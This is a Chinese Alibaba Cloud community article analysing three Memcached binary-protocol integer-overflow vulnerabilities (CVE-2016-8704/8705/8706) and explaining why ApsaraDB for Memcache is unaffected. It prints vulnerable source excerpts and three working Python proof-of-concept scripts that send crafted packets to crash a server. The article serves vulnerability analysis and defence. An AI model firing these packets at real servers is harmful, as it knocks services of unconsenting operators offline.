备案控制台
探索云世界
开发者社区 数据库 文章 正文

Memcached命令执行漏洞(CVE-2016-8704、CVE-2016-8705、CVE-2016-8706)原理和对阿里云Memcache影响分析

2016-11-09 7809
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: Memcached是一个广泛使用的高速缓存系统,近期研究者发现小于1.4.33的版本存在3个整数溢出漏洞,通过这几个漏洞攻击者可以触发堆溢出导致crash,这里对漏洞做了分析和验证。尔后验证了阿里云ApsaraDB for Memcache不受漏洞影响,并分析了原因。

漏洞简介

Memcached是一个广泛使用的高速缓存系统,近期研究者发现小于1.4.33的版本存在3个整数溢出漏洞,通过这几个漏洞攻击者可以触发堆溢出导致crash。官方在11月1日发布了升级公告。漏洞作者已经提供了很详细的描述,在这里仅做简单的整理和验证。

后面验证了阿里云ApsaraDB for Memcache不受漏洞影响,并分析了原因。这个案例深刻告诉我们,对于用户输入,一定要做全面的检查。

漏洞分析

漏洞仅仅在binary时会触发。本质都是没有对用户输入的协议做严格全面的边界检查,导致在调用item.c中的do_item_alloc()函数时, 传入的参数nbytes是个负值,导致堆栈溢出。

item *do_item_alloc(char *key, const size_t nkey, const int flags,
                    const rel_time_t exptime, const int nbytes,
                    const uint32_t cur_hv) {
  size_t ntotal = item_make_header(nkey + 1, flags, nbytes, suffix, &nsuffix);
}

ntotal大小的内存用来存放item、flags、key、value。当nbytes为负值,导致ntotal偏小,导致溢出。

CVE-2016-8704

当执行Append (opcode 0x0e), Prepend (opcode 0x0f), AppendQ (0x19), PrependQ (opcode 0x1a) 命令时会进入这样如下代码路径:

case PROTOCOL_BINARY_CMD_APPEND:
case PROTOCOL_BINARY_CMD_PREPEND:
  if (keylen > 0 && extlen == 0) {
    bin_read_key(c, bin_reading_set_header, 0);
  } else {
    protocol_error = 1;
  }
  break;

这里并仅检查了keylen和extlen的值,并没有检查bodylen。

complete_nread_binary()后,即当从socket中读取和解析完header、extlen、key后,注意此时value还没从socket中读取,程序进入了process_bin_append_prepend()函数中,

key = binary_get_key(c);
nkey = c->binary_header.request.keylen; //
vlen = c->binary_header.request.bodylen - nkey;
...
it = item_alloc(key, nkey, 0, 0, vlen+2);

这里keylen做过合法性检查,bodylen没有,所以itme_alloc()函数中的参数中keynkey可以保证合法性,但vlen无法保证。

PoC代码:

# -*- coding: utf-8 -*-

import struct
import socket
import sys

MEMCACHED_REQUEST_MAGIC = "\x80"
OPCODE_PREPEND_Q = "\x1a"
key_len = struct.pack("!H", 0xfa)
extra_len = "\x00"
data_type = "\x00"
vbucket = "\x00\x00"
body_len = struct.pack("!I", 0)
opaque = struct.pack("!I", 0)
CAS = struct.pack("!Q", 0)
body = "A" * 1024

if len(sys.argv) != 3:
    print "./poc_crash.py <server> <port>"
    sys.exit(1)

packet = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len
packet += data_type + vbucket + body_len + opaque + CAS
packet += body

set_packet = "set testkey 0 60 4\r\ntest\r\n"
get_packet = "get testkey\r\n"

s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((sys.argv[1], int(sys.argv[2])))
s1.sendall(set_packet)
print s1.recv(1024)
s1.close()

s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((sys.argv[1], int(sys.argv[2])))
s2.sendall(packet)
print s2.recv(1024)
s2.close()

s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s3.connect((sys.argv[1], int(sys.argv[2])))
s3.sendall(get_packet)
s3.recv(1024)
s3.close()

当进入process_bin_append_prepend()函数中,nkey 250、vlen -250, 调用item_alloc(), 触发漏洞。

CVE-2016-8705

当进行Set (opcode 0x01),Add (opcode 0x02), Replace (opcode 0x03) ,SetQ (opcode 0x11), AddQ (opcode 0x12) ,ReplaceQ (opcode 0x13)作时会进入如下代码路径:

static void dispatch_bin_command(conn *c) {
  int extlen = c->binary_header.request.extlen;
  int keylen = c->binary_header.request.keylen;
  uint32_t bodylen = c->binary_header.request.bodylen;
  ...
  case PROTOCOL_BINARY_CMD_SET: /* FALLTHROUGH */
  case PROTOCOL_BINARY_CMD_ADD: /* FALLTHROUGH */
  case PROTOCOL_BINARY_CMD_REPLACE:
    if (extlen == 8 && keylen != 0 && bodylen >= (keylen + 8)) {
      bin_read_key(c, bin_reading_set_header, 8);
    } else {
      protocol_error = 1;
    }
    break;
}

在这里需满足bodylen >= (keylen + 8),这里要注意的是各变量类型,bodylen 为uint32_t。

complete_nread_binary()后,即当从socket中读取和解析完header、extlen、key后,注意此时value还没从socket中读取,程序进入process_bin_update()

static void process_bin_update(conn *c) {
  int nkey;
  int vlen;
  ...
  key = binary_get_key(c);
  nkey = c->binary_header.request.keylen;
  ...
  vlen = c->binary_header.request.bodylen - (nkey + c->binary_header.request.extlen);
  ...
  it = item_alloc(key, nkey, req->message.body.flags,
                  realtime(req->message.body.expiration), vlen+2);
}

bodylen为无符号整形,在赋值给整形的vlen时会做类型转换,若bodylen过大, vlen 会变成一个负数,进而调用item_alloc()触发漏洞。

PoC:

import struct
import socket
import sys

MEMCACHED_REQUEST_MAGIC = "\x80"
OPCODE_ADD = "\x02"
key_len = struct.pack("!H", 0xfa)
extra_len = "\x08"
data_type = "\x00"
vbucket = "\x00\x00"
body_len = struct.pack("!I", 0xffffffd0)
opaque = struct.pack("!I", 0)
CAS = struct.pack("!Q", 0)
extras_flags = 0xdeadbeef
extras_expiry = struct.pack("!I", 0xe10)
body = "A" * 1024

packet = MEMCACHED_REQUEST_MAGIC + OPCODE_ADD + key_len + extra_len
packet += data_type + vbucket + body_len + opaque + CAS
packet += body
if len(sys.argv) != 3:
    print "./poc_add.py <server> <port>"
    sys.exit(1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], int(sys.argv[2])))
s.sendall(packet)
print s.recv(1024)
s.close()

dispatch_bin_command()中 keylen为250,bodylen为 4294967248,通过了检查。process_bin_update()中 nkey为250,vlen 为 -306,调用item_alloc() 触发漏洞。

CVE-2016-8706

当进行 SASL_AUTH 操作,进入下面代码步骤:

static void dispatch_bin_command(conn *c) {
  ...
  case PROTOCOL_BINARY_CMD_SASL_AUTH:
  case PROTOCOL_BINARY_CMD_SASL_STEP:
  if (extlen == 0 && keylen != 0) {
    bin_read_key(c, bin_reading_sasl_auth, 0);
  } else {
    protocol_error = 1;
  }
  break;
  ...
}

这里只检查了extlen 和keylen,没有对bodylen进行检查。

complete_nread_binary()后,即当从socket中读取和解析完header、extlen、key后,注意此时value还没从socket中读取,进入process_bin_sasl_auth()函数:

static void process_bin_sasl_auth(conn *c) {
  ...
  int nkey = c->binary_header.request.keylen;
  int vlen = c->binary_header.request.bodylen - nkey;
  ...
  item* it = item_alloc(key, nkey, 0, 0, vlen);
}

只要bodylen 小于keylen,vlen 变为负值。

PoC:

import struct
import socket
import sys

MEMCACHED_REQUEST_MAGIC = "\x80"
OPCODE_SET = "\x21"
key_len = struct.pack("!H",32)
body_len = struct.pack("!I",1)
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_SET + key_len + body_len*2 + "A"*1000
if len(sys.argv) != 3:
    print "./poc_sasl.py <server> <ip>"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1],int(sys.argv[2])))
    s.sendall(packet)
    print s.recv(1024)
    s.close()

process_bin_sasl_auth()中 nkey为32,vlen 为 -31,调用item_alloc()触发漏洞。

阿里云ApsaraDB for Memcache(原名OCS) 验证分析

阿里云ApsaraDB for Memcache,底层不是用的官方Memcached,而且基于自研的Tair,兼容Memcached协议。对于用户输入的协议,做了严格的边界检查,避免了上述漏洞。相关部分伪代码如下:

int16_t extlen = c->binary_header.request.extlen;
int16_t keylen = c->binary_header.request.keylen;
int32_t bodylen = c->binary_header.request.bodylen;
if (boylen < 0 || bodylen > 2*1024*1024)
{
  decode protocal error;
  主动close 连接;
}
if (extlen < 0 || keylen < 0 || bodylen < keylen + extlen)
{
  decode protocal error;
  主动close 连接;
}

使用上述的PoC代码测试ApsaraDB for Memcache,对应连接会被server端直接close()掉。

文章标签:
安全
Memcache
NoSQL
移动开发
关键词:
阿里云命令
阿里云原理
命令阿里云
memcached命令
memcached原理
云痕
目录
相关文章
爱学习的千影
|
2月前
|
机器人
阿里云 RPA 的成本效益分析
机器人流程自动化(RPA)技术在企业数字化转型中扮演着越来越重要的角色。阿里云 RPA 作为一种高效的自动化解决方案,不仅可以提高业务效率,还可以降低运营成本。本文将对阿里云 RPA 的成本效益进行分析,帮助企业更好地评估和利用这一技术。
爱学习的千影
80 1
云安全专家
|
7月前
|
Kubernetes 安全 Linux
开源Chart包安全分析发布,阿里云视角容器安全基线的重要性
云原生环境下,容器成为了软件开发过程中打包与分发的标准。
云安全专家
203 0
开源Chart包安全分析发布,阿里云视角容器安全基线的重要性
数据中台炜松
|
1月前
|
数据库
阿里云DTS数据迁移和数据同步的差异性分析
阿里云DTS作为一款常用的数据库表迁移工具,提供了功能非常类似的两个功能:数据迁移、数据同步。阿里云DTS产品官网对这两个功能模块进行了简单的区分: 场景1:存量数据批量迁移,建议使用数据迁移功能。 场景2:增量数据实时同步,建议使用数据同步功能。 实际上,无论是数据迁移还是数据同步,都可以做 “结构初始化”+“全量数据迁移”+“增量迁移”,因此两者功能差异并不明显。笔者在多个项目实践DTS数据迁移,在简单需求场景下,将DTS的数据迁移、数据同步进行对比和总结。
数据中台炜松
301 0
周周的奇妙编程
|
6月前
|
存储 安全 网络协议
阿里云SSL数字证书原理、使用、申请流程及部署方式
本文带您了解阿里云数字证书的基本原理、使用、申请流程及部署方式
周周的奇妙编程
2709 3
warmhearted
|
2月前
|
存储 运维 关系型数据库
规划阿里云RDS跨区迁移业务需求业务影响分析
规划阿里云RDS跨区迁移业务需求业务影响分析
warmhearted
24 4
ybbf7fwncy2w2
|
7月前
|
存储 缓存 数据挖掘
AtomData结合阿里云分布式存储实现海量数据分析(三)
AtomData结合阿里云分布式存储实现海量数据分析(三)
ybbf7fwncy2w2
72 0
ybbf7fwncy2w2
|
7月前
|
存储 数据挖掘 大数据
AtomData结合阿里云分布式存储实现海量数据分析(二)
AtomData结合阿里云分布式存储实现海量数据分析(二)
ybbf7fwncy2w2
79 0
ybbf7fwncy2w2
|
7月前
|
存储 数据可视化 数据挖掘
AtomData结合阿里云分布式存储实现海量数据分析(一)
AtomData结合阿里云分布式存储实现海量数据分析(一)
ybbf7fwncy2w2
136 0
xdzdtwo3xonle
|
3月前
|
存储 关系型数据库 分布式数据库
阿里云PolarDB解决乐麦多源数据存储性能问题
乐麦通过使用PolarDB数据库,使整个系统之间的数据查询分析更加高效
xdzdtwo3xonle
390 3
灵杰开发者
|
3月前
|
存储 NoSQL MongoDB
阿里云 Flink 原理分析与应用:深入探索 MongoDB Schema Inference
本文整理自阿里云 Flink 团队归源老师关于阿里云 Flink 原理分析与应用:深入探索 MongoDB Schema Inference 的研究。
灵杰开发者
46939 2
阿里云 Flink 原理分析与应用:深入探索 MongoDB Schema Inference

热门文章

最新文章

  • 1
    超1/3中国500强企业都在用的「汇联易」,为什么选用阿里云RDS?
  • 2
    阿里云实时计算Flink的产品化思考与实践【下】
  • 3
    云效 AppStack + 阿里云 MSE 实现应用服务全链路灰度
  • 4
    购买阿里云活动内云服务器之后设置密码、安全组、增加带宽、挂载云盘教程
  • 5
    在阿里云Ubuntu 20.04服务器中搭建一个 Ghost 博客
  • 6
    阿里云服务器内存型r7、r8a、r8y实例区别参考
  • 7
    飞天发布时刻丨阿里云 ApsaraMQ 全面升级,携手 Confluent 发布全新产品
  • 8
    阿里云服务器经济型e实例2核2G3M带宽99元搭建网站图文教程参考
  • 9
    阿里云3M带宽云服务器并发多大?阿里云3M带宽云服务器测评参考
  • 10
    什么是阿里云FPGA云服务器?FPGA云服务器产品优势及应用场景介绍
  • 1
    挖掘阿里云ECS的潜力:创意应用和未来可能性
    556
  • 2
    iLogtail 2.0 来了;通义灵码下载量破百万丨阿里云云原生 2 月产品月报
    580
  • 3
    阿里云服务器X86计算、Arm计算、GPU/FPGA/ASIC、高性能计算架构区别
    175
  • 4
    阿里云ECS云监控界面
    792
  • 5
    阿里云ECS监控服务
    401
  • 6
    2024年阿里云服务器租用详细价格表(CPU/内存/带宽/系统盘)
    736
  • 7
    手把手教你入门部署幻兽帕鲁服务器:2024年阿里云搭建幻兽帕鲁Palworld联机服务器新手教程
    1083
  • 8
    2024年阿里云上自建Palworld/幻兽帕鲁服务器教程
    1411
  • 9
    2024年阿里云一键搭建部署幻兽帕鲁服务器解决方案
    1450
  • 10
    应用研发平台EMAS 常见问题之用华为的推送界面阿里云收不到如何解决
    382

    • 相关课程

    更多
  • 跟阿里云技术专家学习智能推荐系统
  • 阿里云负载均衡SLB实战演练
  • 云原生基础概念及阿里云云原生产品介绍
  • 阿里云图数据库GDB入门与应用
  • 企业上云攻略-阿里云网络产品应用系列教程
  • 阿里云物联网平台专题介绍

    • 相关电子书

    更多
  • 阿里云云原生 Serverless 技术实践营 PPT 演讲
  • 阿里云产品十月刊
  • 基于阿里云构建博学谷平台实时湖仓

    • 相关实验场景

    更多
  • 使用阿里云ECS监控您的特斯拉
  • 使用阿里云ECS安装家用内网穿透服务
  • 在阿里云百炼大模型中快速创建企业知识应用
  • 使用阿里云ECS搭建一套网页IDE
  • 使用阿里云ECS搭建自己的持续集成服务
  • 阿里云百炼xAnalyticDB PostgreSQL构建AIGC应用
    • 下一篇
    阿里云oss简介和使用流程